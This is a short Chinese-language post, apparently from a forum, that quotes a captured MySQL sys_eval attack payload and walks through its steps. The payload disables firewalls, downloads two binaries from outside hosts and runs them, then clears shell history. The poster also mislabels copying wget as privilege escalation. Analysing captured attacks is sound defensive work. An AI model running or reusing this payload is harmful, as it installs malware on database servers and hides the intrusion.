select sys_eval('/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cp /usr/bin/wget .;chmod +x wget;./wget -P ./dbms_temp http://game918.me:2545/websevrer;chmod 0755 ./dbms_temp/websevrer;./dbms_temp/websevrer;./wget -P ./db_temp http://198.55.103.12:280/huang;chmod 0755 ./db_temp/huang;./db_temp/huang;rm -rf wget;history -c;')
linux命令我看得懂
第一步关闭了所有类型的防火墙,
第二步wget提权
第三步get一个应用程序 webserver 运行
第四步get一个应用程序 huang 运行
第五步删记录
是我错觉吗...木马好像就是这么几步流程......